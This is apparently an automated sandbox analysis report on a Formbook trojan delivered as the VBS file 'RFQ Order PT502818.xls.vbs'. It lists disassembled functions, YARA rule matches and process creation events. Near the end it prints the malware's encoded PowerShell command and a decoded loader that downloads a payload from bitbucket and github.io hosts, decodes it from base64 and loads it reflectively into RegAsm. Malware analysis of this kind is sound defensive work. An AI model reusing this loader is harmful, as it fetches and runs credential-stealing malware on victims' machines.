Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_035981CC 8_2_035981CC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_035A01AA 8_2_035A01AA
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034EB1B0 8_2_034EB1B0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034E70C0 8_2_034E70C0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0358F0CC 8_2_0358F0CC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_035970E9 8_2_035970E9
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0359F0E0 8_2_0359F0E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03504750 8_2_03504750
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034E0770 8_2_034E0770
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0359F7B0 8_2_0359F7B0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_035916CC 8_2_035916CC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034FC6E0 8_2_034FC6E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03597571 8_2_03597571
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034E0535 8_2_034E0535
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_035A0591 8_2_035A0591
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0357D5B0 8_2_0357D5B0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03592446 8_2_03592446
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034D1460 8_2_034D1460
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0359F43F 8_2_0359F43F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0358E4F6 8_2_0358E4F6
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0359AB40 8_2_0359AB40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0359FB76 8_2_0359FB76
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03596BD7 8_2_03596BD7
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0351DBF9 8_2_0351DBF9
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034FFB80 8_2_034FFB80
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0359FA49 8_2_0359FA49
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03597A46 8_2_03597A46
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03553A6C 8_2_03553A6C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0358DAC6 8_2_0358DAC6
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034DEA80 8_2_034DEA80
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03525AA0 8_2_03525AA0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0357DAAC 8_2_0357DAAC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034E9950 8_2_034E9950
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034FB950 8_2_034FB950
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034F6962 8_2_034F6962
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034E29A0 8_2_034E29A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_035AA9A6 8_2_035AA9A6
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034E2840 8_2_034E2840
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034EA840 8_2_034EA840
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0358C87C 8_2_0358C87C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0354D800 8_2_0354D800
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0350E8F0 8_2_0350E8F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034E38E0 8_2_034E38E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034C68B8 8_2_034C68B8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03554F40 8_2_03554F40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0359FF09 8_2_0359FF09
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03500F30 8_2_03500F30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03522F28 8_2_03522F28
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034D2FC8 8_2_034D2FC8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034ECFE0 8_2_034ECFE0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034E1F92 8_2_034E1F92
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0359FFB1 8_2_0359FFB1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034E0E59 8_2_034E0E59
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0359EE26 8_2_0359EE26
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0359EEDB 8_2_0359EEDB
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0359CE93 8_2_0359CE93
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034F2E90 8_2_034F2E90
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034E9EB0 8_2_034E9EB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03591D5A 8_2_03591D5A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034E3D40 8_2_034E3D40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03597D73 8_2_03597D73
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034EAD00 8_2_034EAD00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034FFDC0 8_2_034FFDC0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034DADE0 8_2_034DADE0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034F8DBF 8_2_034F8DBF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034E0C00 8_2_034E0C00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03559C32 8_2_03559C32
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0359FCF2 8_2_0359FCF2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034D0CF2 8_2_034D0CF2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03580CB5 8_2_03580CB5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B1D93B 8_2_00B1D93B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B02D90 8_2_00B02D90
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B1E54C 8_2_00B1E54C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B1DE2C 8_2_00B1DE2C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B09E1B 8_2_00B09E1B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B09E60 8_2_00B09E60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B02FB0 8_2_00B02FB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B1E7B8 8_2_00B1E7B8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B1DF84 8_2_00B1DF84
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0324A036 8_2_0324A036
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03245B30 8_2_03245B30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03245B32 8_2_03245B32
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0324B232 8_2_0324B232
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03248912 8_2_03248912
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03241082 8_2_03241082
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03242D02 8_2_03242D02
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0324E5CD 8_2_0324E5CD
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0313EA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 03105130 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 03117E54 appears 89 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0314F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 030BB970 appears 268 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 03515130 appears 36 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 0354EA12 appears 84 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 034CB970 appears 266 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 03527E54 appears 88 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 0355F290 appears 105 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: RFQ Order PT502818.xls.vbs Initial sample: Strings found which are bigger than 50
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5448
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 2044
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5448 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 2044 Jump to behavior
Yara signature match
Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2654798948.0000000000CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2654798948.0000000000CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2654798948.0000000000CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1641106278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.1641106278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1641106278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2654692262.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2654692262.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2654692262.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2654885406.0000000000DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2654885406.0000000000DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2654885406.0000000000DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: powershell.exe PID: 7388, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7876, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: RegAsm.exe PID: 1984, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: netsh.exe PID: 4756, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.powershell.exe.2b59c690000.0.raw.unpack, SimpleZip.cs Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.powershell.exe.2b59c690000.0.raw.unpack, SimpleZip.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.powershell.exe.2b59c690000.0.raw.unpack, SimpleZip.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.expl.evad.winVBS@527/7@6/4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00E37DFA FormatMessageW,GetLastError,wprintf,GetStdHandle,LocalFree, 8_2_00E37DFA
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00E38D48 CoInitializeEx,CoCreateInstance,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysAllocString,SysAllocString,VariantChangeType,VariantChangeType,VariantChangeType,VariantChangeType,VariantChangeType,VariantChangeType,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,CoUninitialize, 8_2_00E38D48
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6484:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nj443z3a.3iz.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ Order PT502818.xls.vbs"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: RFQ Order PT502818.xls.vbs Virustotal: Detection: 13%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ Order PT502818.xls.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@H
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.mApAgbe/moc.swanozama.1-tsae-su.3s.52akel//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
